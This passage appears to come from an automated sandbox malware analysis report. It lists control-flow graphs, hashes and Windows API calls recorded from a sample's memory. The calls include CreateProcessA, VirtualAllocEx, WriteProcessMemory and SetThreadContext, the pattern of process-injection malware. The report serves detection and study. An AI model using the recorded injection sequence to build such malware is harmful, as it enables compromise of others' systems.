138f7e2 GetModuleHandleW 21827->21831 21828->21827 21829->21827 21830->21826 21831->21826 21834 138eaca 21832->21834 21835 138e9d9 21832->21835 21833 138e9e5 21833->21821 21834->21821 21835->21833 21837 138ee28 GetModuleHandleW LoadLibraryExW GetModuleHandleW 21835->21837 21838 138ee17 GetModuleHandleW LoadLibraryExW GetModuleHandleW 21835->21838 21836 138ea25 21839 138f7f0 GetModuleHandleW 21836->21839 21840 138f7e2 GetModuleHandleW 21836->21840 21837->21836 21838->21836 21839->21834 21840->21834 21842 13843df 21841->21842 21843 13844bc 21842->21843 21849 1383e20 21842->21849 21843->21843 21847 13843b8 21845->21847 21846 13844bc 21846->21846 21847->21846 21848 1383e20 CreateActCtxA 21847->21848 21848->21846 21850 1385448 CreateActCtxA 21849->21850 21852 138550b 21850->21852 21853 7449dd8 21854 7449f63 21853->21854 21855 7449dfe 21853->21855 21855->21854 21858 744a050 PostMessageW 21855->21858 21860 744a058 PostMessageW 21855->21860 21859 744a0c4 21858->21859 21859->21855 21861 744a0c4 21860->21861 21861->21855

                                                                                                                Executed Functions

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.320761270.0000000007440000.00000040.00000001.sdmp, Offset: 07440000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7440000_20220114080343434.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 34211ea641b9a7b807e94e5ee8ee4a445bd32b4c958c2fa7bcc64bfdf16cde5d
                                                                                                                • Instruction ID: e6bf6532e2e4076eea13a0f97bd7dbfc4f1dc0d7d643db96db5baeb2427b84b6
                                                                                                                • Opcode Fuzzy Hash: 34211ea641b9a7b807e94e5ee8ee4a445bd32b4c958c2fa7bcc64bfdf16cde5d
                                                                                                                • Instruction Fuzzy Hash: 8D81F0B0D14619CBEB20DFA9C9847EEBBF9BF4A304F10952AD409A7240DB359986DF14
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.320761270.0000000007440000.00000040.00000001.sdmp, Offset: 07440000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7440000_20220114080343434.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 59c956df88612579a7beb46a62940f6af50592977e4fc925fe320d3422261655
                                                                                                                • Instruction ID: 15eb2bf2aecc1a6be9f53f87948d91deb62d7c689b4456e002e391bfaf0c049b
                                                                                                                • Opcode Fuzzy Hash: 59c956df88612579a7beb46a62940f6af50592977e4fc925fe320d3422261655
                                                                                                                • Instruction Fuzzy Hash: 776113B4D14618CBEB10DFA9D9487EEBBF9BB4A304F10992BD409A7241DB358986DF04
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 0 744736c-744740d 2 7447446-7447466 0->2 3 744740f-7447419 0->3 8 744749f-74474ce 2->8 9 7447468-7447472 2->9 3->2 4 744741b-744741d 3->4 6 7447440-7447443 4->6 7 744741f-7447429 4->7 6->2 10 744742d-744743c 7->10 11 744742b 7->11 17 7447507-74475c1 CreateProcessA 8->17 18 74474d0-74474da 8->18 9->8 13 7447474-7447476 9->13 10->10 12 744743e 10->12 11->10 12->6 14 7447478-7447482 13->14 15 7447499-744749c 13->15 19 7447484 14->19 20 7447486-7447495 14->20 15->8 31 74475c3-74475c9 17->31 32 74475ca-7447650 17->32 18->17 21 74474dc-74474de 18->21 19->20 20->20 22 7447497 20->22 23 74474e0-74474ea 21->23 24 7447501-7447504 21->24 22->15 26 74474ec 23->26 27 74474ee-74474fd 23->27 24->17 26->27 27->27 28 74474ff 27->28 28->24 31->32 42 7447660-7447664 32->42 43 7447652-7447656 32->43 44 7447674-7447678 42->44 45 7447666-744766a 42->45 43->42 46 7447658 43->46 48 7447688-744768c 44->48 49 744767a-744767e 44->49 45->44 47 744766c 45->47 46->42 47->44 51 744769e-74476a5 48->51 52 744768e-7447694 48->52 49->48 50 7447680 49->50 50->48 53 74476a7-74476b6 51->53 54 74476bc 51->54 52->51 53->54 55 74476bd 54->55 55->55
                                                                                                                APIs
                                                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 074475AE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.320761270.0000000007440000.00000040.00000001.sdmp, Offset: 07440000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7440000_20220114080343434.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 963392458-0
                                                                                                                • Opcode ID: 464a80caa565edce2acd6da507303ead933a16f8cf6bbe1b322155a7b88ede28
                                                                                                                • Instruction ID: 71307063b4d2260c4925f3b6a44242e2028a12424f942b8eee3a44bd5cee5d32
                                                                                                                • Opcode Fuzzy Hash: 464a80caa565edce2acd6da507303ead933a16f8cf6bbe1b322155a7b88ede28
                                                                                                                • Instruction Fuzzy Hash: F5A14DB1D00219DFEB11CFA8C841BEEBBB6BF48314F14856AD819A7340DB749986DF91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 57 7447378-744740d 59 7447446-7447466 57->59 60 744740f-7447419 57->60 65 744749f-74474ce 59->65 66 7447468-7447472 59->66 60->59 61 744741b-744741d 60->61 63 7447440-7447443 61->63 64 744741f-7447429 61->64 63->59 67 744742d-744743c 64->67 68 744742b 64->68 74 7447507-74475c1 CreateProcessA 65->74 75 74474d0-74474da 65->75 66->65 70 7447474-7447476 66->70 67->67 69 744743e 67->69 68->67 69->63 71 7447478-7447482 70->71 72 7447499-744749c 70->72 76 7447484 71->76 77 7447486-7447495 71->77 72->65 88 74475c3-74475c9 74->88 89 74475ca-7447650 74->89 75->74 78 74474dc-74474de 75->78 76->77 77->77 79 7447497 77->79 80 74474e0-74474ea 78->80 81 7447501-7447504 78->81 79->72 83 74474ec 80->83 84 74474ee-74474fd 80->84 81->74 83->84 84->84 85 74474ff 84->85 85->81 88->89 99 7447660-7447664 89->99 100 7447652-7447656 89->100 101 7447674-7447678 99->101 102 7447666-744766a 99->102 100->99 103 7447658 100->103 105 7447688-744768c 101->105 106 744767a-744767e 101->106 102->101 104 744766c 102->104 103->99 104->101 108 744769e-74476a5 105->108 109 744768e-7447694 105->109 106->105 107 7447680 106->107 107->105 110 74476a7-74476b6 108->110 111 74476bc 108->111 109->108 110->111 112 74476bd 111->112 112->112
                                                                                                                APIs
                                                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 074475AE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.320761270.0000000007440000.00000040.00000001.sdmp, Offset: 07440000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7440000_20220114080343434.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 963392458-0
                                                                                                                • Opcode ID: ec07e5e2e1285e1c99adb833e2af78d9eccf6facdd3aeb72d1af2729ee305dcf
                                                                                                                • Instruction ID: efbecc4770b56d15cb60d84aa94892367bd8d1f80e6cf437b9d4c189e6f57b6b
                                                                                                                • Opcode Fuzzy Hash: ec07e5e2e1285e1c99adb833e2af78d9eccf6facdd3aeb72d1af2729ee305dcf
                                                                                                                • Instruction Fuzzy Hash: 54914EB1D00219DFEB11CFA8C841BEEBBB6BF48314F14856AD819A7340DB749986DF91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 114 1389c90-1389ca5 call 1387974 117 1389cbb-1389cbf 114->117 118 1389ca7 114->118 119 1389cc1-1389ccb 117->119 120 1389cd3-1389d14 117->120 168 1389cad call 1389f18 118->168 169 1389cad call 1389f08 118->169 119->120 125 1389d21-1389d2f 120->125 126 1389d16-1389d1e 120->126 121 1389cb3-1389cb5 121->117 122 1389df0-1389eb0 121->122 163 1389eb8-1389ee3 GetModuleHandleW 122->163 164 1389eb2-1389eb5 122->164 128 1389d31-1389d36 125->128 129 1389d53-1389d55 125->129 126->125 130 1389d38-1389d3f call 1388fa8 128->130 131 1389d41 128->131 132 1389d58-1389d5f 129->132 134 1389d43-1389d51 130->134 131->134 135 1389d6c-1389d73 132->135 136 1389d61-1389d69 132->136 134->132 139 1389d80-1389d89 call 1388fb8 135->139 140 1389d75-1389d7d 135->140 136->135 145 1389d8b-1389d93 139->145 146 1389d96-1389d9b 139->146 140->139 145->146 147 1389db9-1389dc6 146->147 148 1389d9d-1389da4 146->148 155 1389dc8-1389de6 147->155 156 1389de9-1389def 147->156 148->147 149 1389da6-1389db6 call 1388fc8 call 1388fd8 148->149 149->147 155->156 165 1389eec-1389f00 163->165 166 1389ee5-1389eeb 163->166 164->163 166->165 168->121 169->121
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.311498431.0000000001380000.00000040.00000001.sdmp, Offset: 01380000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_1380000_20220114080343434.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule
                                                                                                                • String ID:
                                                                                                                • API String ID: 4139908857-0
                                                                                                                • Opcode ID: 5a59e4b07c0b15b5a48e35a7a00bd490446ce91461240f3fe8c5491c05943b8f
                                                                                                                • Instruction ID: 33f0921e7b61188723e27f80363b126c31967c1fa9a93639a2fa01148c110263
                                                                                                                • Opcode Fuzzy Hash: 5a59e4b07c0b15b5a48e35a7a00bd490446ce91461240f3fe8c5491c05943b8f
                                                                                                                • Instruction Fuzzy Hash: 2E713670A00B058FDB24EF6AD4457AABBF5FF88308F008929D54AD7A40D774E949CF95
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 170 1383e20-1385509 CreateActCtxA 173 138550b-1385511 170->173 174 1385512-138556c 170->174 173->174 181 138557b-138557f 174->181 182 138556e-1385571 174->182 183 1385590 181->183 184 1385581-138558d 181->184 182->181 186 1385591 183->186 184->183 186->186
                                                                                                                APIs
                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 013854F9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.311498431.0000000001380000.00000040.00000001.sdmp, Offset: 01380000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_1380000_20220114080343434.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Create
                                                                                                                • String ID:
                                                                                                                • API String ID: 2289755597-0
                                                                                                                • Opcode ID: 71e125fc12eda13dc39a66d5f1d275ca7c48e7dd7de9508f2246aace3e1538d0
                                                                                                                • Instruction ID: 59c18c2339640b0d5c1e3f8496d4cc9a154ee626f418f9a6055d5809fc4e09c5
                                                                                                                • Opcode Fuzzy Hash: 71e125fc12eda13dc39a66d5f1d275ca7c48e7dd7de9508f2246aace3e1538d0
                                                                                                                • Instruction Fuzzy Hash: F441CFB0C00718DBDB24DFA9C885BDEBBB9BF48308F148469D409AB251DB716945CFA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 187 138543c-1385509 CreateActCtxA 189 138550b-1385511 187->189 190 1385512-138556c 187->190 189->190 197 138557b-138557f 190->197 198 138556e-1385571 190->198 199 1385590 197->199 200 1385581-138558d 197->200 198->197 202 1385591 199->202 200->199 202->202
                                                                                                                APIs
                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 013854F9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.311498431.0000000001380000.00000040.00000001.sdmp, Offset: 01380000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_1380000_20220114080343434.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Create
                                                                                                                • String ID:
                                                                                                                • API String ID: 2289755597-0
                                                                                                                • Opcode ID: d704ba002dd2d9b8473ccfb0675b6f8c88561c3bef9d3a5269042bb2b477cf54
                                                                                                                • Instruction ID: 2fc8891ec7ec281679e1e8fda9b7c16a4c56835f63ec5170b4c936b6817cd92e
                                                                                                                • Opcode Fuzzy Hash: d704ba002dd2d9b8473ccfb0675b6f8c88561c3bef9d3a5269042bb2b477cf54
                                                                                                                • Instruction Fuzzy Hash: 3F41CFB1C00718CFDB24DFA9C885BDDBBB5BF48308F248469D409AB251DB74694ACF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 203 74470e8-744713e 205 7447140-744714c 203->205 206 744714e-744718d WriteProcessMemory 203->206 205->206 208 7447196-74471c6 206->208 209 744718f-7447195 206->209 209->208
                                                                                                                APIs
                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07447180
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.320761270.0000000007440000.00000040.00000001.sdmp, Offset: 07440000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7440000_20220114080343434.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                • String ID:
                                                                                                                • API String ID: 3559483778-0
                                                                                                                • Opcode ID: afe6faeccb56362ab02e3635b845fc546ee04d6b652ebfa1faf44e087804c565
                                                                                                                • Instruction ID: a1f6251e71833df54238812862c0147643ff999026926eee65a5fe0ac47edaf2
                                                                                                                • Opcode Fuzzy Hash: afe6faeccb56362ab02e3635b845fc546ee04d6b652ebfa1faf44e087804c565
                                                                                                                • Instruction Fuzzy Hash: 392122B5D002099FDB10CFA9C981BEEBBF5FF48314F14882AE918A7340D7789955CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 213 7446f52-7446f54 214 7446f46-7446f50 213->214 215 7446f56-7446fa3 213->215 214->213 217 7446fa5-7446fb1 215->217 218 7446fb3-7446fb6 215->218 217->218 219 7446fbd-7446fe3 SetThreadContext 218->219 220 7446fe5-7446feb 219->220 221 7446fec-744701c 219->221 220->221
                                                                                                                APIs
                                                                                                                • SetThreadContext.KERNELBASE(?,00000000), ref: 07446FD6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.320761270.0000000007440000.00000040.00000001.sdmp, Offset: 07440000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7440000_20220114080343434.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ContextThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 1591575202-0
                                                                                                                • Opcode ID: 96c7404b6d3ba8428d3ff4b0e97b159f71d8b16e2d573c94b8dac42c777879f1
                                                                                                                • Instruction ID: 491484b0278842126d087a34c158b19eff96132932076f214ae1471238e582e7
                                                                                                                • Opcode Fuzzy Hash: 96c7404b6d3ba8428d3ff4b0e97b159f71d8b16e2d573c94b8dac42c777879f1
                                                                                                                • Instruction Fuzzy Hash: 052136B5D002098FDB10CFA9C4857EEBBF4AF48224F54882AD459A7641D778A944CFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 225 74470f0-744713e 227 7447140-744714c 225->227 228 744714e-744718d WriteProcessMemory 225->228 227->228 230 7447196-74471c6 228->230 231 744718f-7447195 228->231 231->230
                                                                                                                APIs
                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07447180
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.320761270.0000000007440000.00000040.00000001.sdmp, Offset: 07440000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7440000_20220114080343434.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                • String ID:
                                                                                                                • API String ID: 3559483778-0
                                                                                                                • Opcode ID: 8c26ad89b560f8332cd7dbbf201fc33a6e7fd34827fa1dcbe5b59c3fad5023ab
                                                                                                                • Instruction ID: 0a0497e7068e9014bae5e63e04c6d6013d5366b93155079e1f07230f5a4ef9f8
                                                                                                                • Opcode Fuzzy Hash: 8c26ad89b560f8332cd7dbbf201fc33a6e7fd34827fa1dcbe5b59c3fad5023ab
                                                                                                                • Instruction Fuzzy Hash: F12115B59003599FCB10CFA9C885BDEBBF5FF48314F14882AE918A7340D7789955CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 235 138a9b4-138c24c DuplicateHandle 237 138c24e-138c254 235->237 238 138c255-138c272 235->238 237->238
                                                                                                                APIs
                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0138C17E,?,?,?,?,?), ref: 0138C23F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.311498431.0000000001380000.00000040.00000001.sdmp, Offset: 01380000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_1380000_20220114080343434.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DuplicateHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 3793708945-0
                                                                                                                • Opcode ID: ab94471572b43e7071a96a207735cc0498d5b45e102f9382d350497313f634ad
                                                                                                                • Instruction ID: 5a4cda2542f017d4354a350c235fa7732d4535c9fdb2596f5d4a17b13fefd23d
                                                                                                                • Opcode Fuzzy Hash: ab94471572b43e7071a96a207735cc0498d5b45e102f9382d350497313f634ad
                                                                                                                • Instruction Fuzzy Hash: C421E3B59003489FDF10CF99D484AEEBBF8EB48324F14842AE918B3350D374A954CFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 241 138c1b0-138c1b2 242 138c1b8-138c24c DuplicateHandle 241->242 243 138c24e-138c254 242->243 244 138c255-138c272 242->244 243->244
                                                                                                                APIs
                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0138C17E,?,?,?,?,?), ref: 0138C23F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.311498431.0000000001380000.00000040.00000001.sdmp, Offset: 01380000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_1380000_20220114080343434.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DuplicateHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 3793708945-0
                                                                                                                • Opcode ID: ba9c351839db10c11d0972b0e48fe0134c2e551ecabd7c1b9ac5e821d1372127
                                                                                                                • Instruction ID: b2b3fe526290eb63603ac110a48dff27197bc5ba9996951bb3c75154651d0dc9
                                                                                                                • Opcode Fuzzy Hash: ba9c351839db10c11d0972b0e48fe0134c2e551ecabd7c1b9ac5e821d1372127
                                                                                                                • Instruction Fuzzy Hash: 6621D2B59002489FDB10CFA9D485AEEBBF8FB48324F14841AE918A3251D374A954CFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 247 7446f58-7446fa3 249 7446fa5-7446fb1 247->249 250 7446fb3-7446fe3 SetThreadContext 247->250 249->250 252 7446fe5-7446feb 250->252 253 7446fec-744701c 250->253 252->253
                                                                                                                APIs
                                                                                                                • SetThreadContext.KERNELBASE(?,00000000), ref: 07446FD6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.320761270.0000000007440000.00000040.00000001.sdmp, Offset: 07440000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7440000_20220114080343434.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ContextThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 1591575202-0
                                                                                                                • Opcode ID: 5a693bef137a455ceb7af08bcd5d7c62247969761f74bbf694d654327138def3
                                                                                                                • Instruction ID: a2257c9a3863f29907f56da55e4d9d75f86900461d28db3c39fe81eff4fc44e1
                                                                                                                • Opcode Fuzzy Hash: 5a693bef137a455ceb7af08bcd5d7c62247969761f74bbf694d654327138def3
                                                                                                                • Instruction Fuzzy Hash: 25211AB5D002098FDB10DFA9C4857EEBBF8EF88314F54842AD559A7340DB78A944CFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 257 74471d8-744726d ReadProcessMemory 260 7447276-74472a6 257->260 261 744726f-7447275 257->261 261->260
                                                                                                                APIs
                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07447260
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.320761270.0000000007440000.00000040.00000001.sdmp, Offset: 07440000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7440000_20220114080343434.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MemoryProcessRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 1726664587-0
                                                                                                                • Opcode ID: 56d913fa605eb6c7a1eafff1eda870ad2032b1662980a32f96f9b57f64ae8e83
                                                                                                                • Instruction ID: e50f4936c6d0c0798ad39bd427088f3281869988b50506804612f8095a6b2477
                                                                                                                • Opcode Fuzzy Hash: 56d913fa605eb6c7a1eafff1eda870ad2032b1662980a32f96f9b57f64ae8e83
                                                                                                                • Instruction Fuzzy Hash: 132116B5C002599FDF10CFA9C981BEEBBF5FF48314F54882AE919A7240D7389955CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 265 74471e0-744726d ReadProcessMemory 268 7447276-74472a6 265->268 269 744726f-7447275 265->269 269->268
                                                                                                                APIs
                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07447260
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.320761270.0000000007440000.00000040.00000001.sdmp, Offset: 07440000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7440000_20220114080343434.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MemoryProcessRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 1726664587-0
                                                                                                                • Opcode ID: aff665b663f0cda31b03ef867e03e08480b9fcdd6616208ed3a97cdba023443b
                                                                                                                • Instruction ID: e4de1e486175722366617dd44576e6c9bbb91649be419d3e2d52ca217ff5eb55
                                                                                                                • Opcode Fuzzy Hash: aff665b663f0cda31b03ef867e03e08480b9fcdd6616208ed3a97cdba023443b
                                                                                                                • Instruction Fuzzy Hash: 6D2128B1C002599FCF10CFA9C880AEEBBF5FF48314F54882AE518A7240D7749944CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 273 7447028-7447029 274 744705e-74470ab VirtualAllocEx 273->274 275 744702b-7447057 273->275 278 74470b4-74470d9 274->278 279 74470ad-74470b3 274->279 275->274 279->278
                                                                                                                APIs
                                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0744709E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.320761270.0000000007440000.00000040.00000001.sdmp, Offset: 07440000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7440000_20220114080343434.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 4275171209-0
                                                                                                                • Opcode ID: a22ebfa18ce70b7623fcf32c483aa94a54cd644e98623df476f9568c28eac32b
                                                                                                                • Instruction ID: 9bd5e402e493cd0f1faee756c3be5bdd9dc31a57617ec7b81d44c4713ab681c9
                                                                                                                • Opcode Fuzzy Hash: a22ebfa18ce70b7623fcf32c483aa94a54cd644e98623df476f9568c28eac32b
                                                                                                                • Instruction Fuzzy Hash: C61147B58002099FDB21CFA9D8457EEBBF5AF88324F14881AE515A7250D7759944CFA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 283 1389000-138a138 285 138a13a-138a13d 283->285 286 138a140-138a16f LoadLibraryExW 283->286 285->286 287 138a178-138a195 286->287 288 138a171-138a177 286->288 288->287
                                                                                                                APIs
                                                                                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,01389F51,00000800,00000000,00000000), ref: 0138A162
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.311498431.0000000001380000.00000040.00000001.sdmp, Offset: 01380000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_1380000_20220114080343434.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID:
                                                                                                                • API String ID: 1029625771-0
                                                                                                                • Opcode ID: 696e9b3d7bef900f177c3c74a72a57e2bbe494b571e233cc1d76e92c9d8400f6
                                                                                                                • Instruction ID: 847f2d26e0997724ad332b39d2bb1367ae75f92ea2272351da20ac5a7f718705
                                                                                                                • Opcode Fuzzy Hash: 696e9b3d7bef900f177c3c74a72a57e2bbe494b571e233cc1d76e92c9d8400f6
                                                                                                                • Instruction Fuzzy Hash: 9B1117B5D003498FDB10DF9AD444ADEFBF8EB88354F14842AD519B7600C774A945CFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0744709E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.320761270.0000000007440000.00000040.00000001.sdmp, Offset: 07440000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7440000_20220114080343434.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 4275171209-0
                                                                                                                • Opcode ID: d79d00c4e70217cfd619e128e605189149a1ab208a2dc9b438e3894d656a1520
                                                                                                                • Instruction ID: 645b8bd414047452e4076dbf40efdc6a7a2f3fef2c0614cab5909cc5ac11a34e
                                                                                                                • Opcode Fuzzy Hash: d79d00c4e70217cfd619e128e605189149a1ab208a2dc9b438e3894d656a1520
                                                                                                                • Instruction Fuzzy Hash: A01167B58002099FCF10CFA9C844BDFBBF9EF88324F14881AE515A7250D775A944CFA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,01389F51,00000800,00000000,00000000), ref: 0138A162
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.311498431.0000000001380000.00000040.00000001.sdmp, Offset: 01380000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_1380000_20220114080343434.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID:
                                                                                                                • API String ID: 1029625771-0
                                                                                                                • Opcode ID: 46f3b8de1868b07016a6ed747e8cdbc0ea70ca610dc0fcb70dfc9fa4bbf6ed89
                                                                                                                • Instruction ID: 7812c471954029f8db72dcc755a95a9842052c6f24829059e5d25cbdde86097c
                                                                                                                • Opcode Fuzzy Hash: 46f3b8de1868b07016a6ed747e8cdbc0ea70ca610dc0fcb70dfc9fa4bbf6ed89
                                                                                                                • Instruction Fuzzy Hash: BD1114B6D003098FDB10CF99D444BDEFBF4AB48354F14882AD515B7600C378A545CFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,01389CA3), ref: 01389ED6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.311498431.0000000001380000.00000040.00000001.sdmp, Offset: 01380000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
